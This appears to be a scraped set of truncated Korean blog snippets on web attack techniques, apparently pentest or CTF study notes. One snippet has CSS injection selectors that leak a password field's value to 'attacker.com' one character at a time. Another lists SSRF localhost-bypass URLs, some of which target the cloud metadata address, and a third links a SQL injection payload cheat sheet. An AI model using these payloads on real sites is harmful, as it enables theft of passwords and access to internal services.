CSS Injection HTML 삽입 미리보기할 수 없는 소스 Sequential Importing Chaining HTML 삽입 미리보기할 수 없는 소스 CSS 선택자를 이용하여 HTML 태그 내의 value값을 받아올 수 있다. input[name=password][value^=a]{ background: url('https://attacker.com/a'); } input[name=password][value^=b]{ background: url('https://attacker.com/b'); } /* ... */ input[name=password][value^=9]{ background: url('https://attacker.com/9'); } URL HTML 삽입 미리보기할 수 없는 소스 ..
SSRF 공격기법 HTML 삽입 미리보기할 수 없는 소스 localhost bypass HTML 삽입 미리보기할 수 없는 소스 http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 http://2852039166/ = http://169.254.169.254 http://127.0.0.1 http://0.0.0.0 http://localhost http://[::] http://0000::1 http://spoofed.burpcollaborator.net http://localtest.me http://localhost.hahwul.com http:..
Cheat Sheet [각종 페이로드 다 나와있음] https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF A list of useful payloads and bypass for Web Application Security and Pentest/CTF - GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass ..
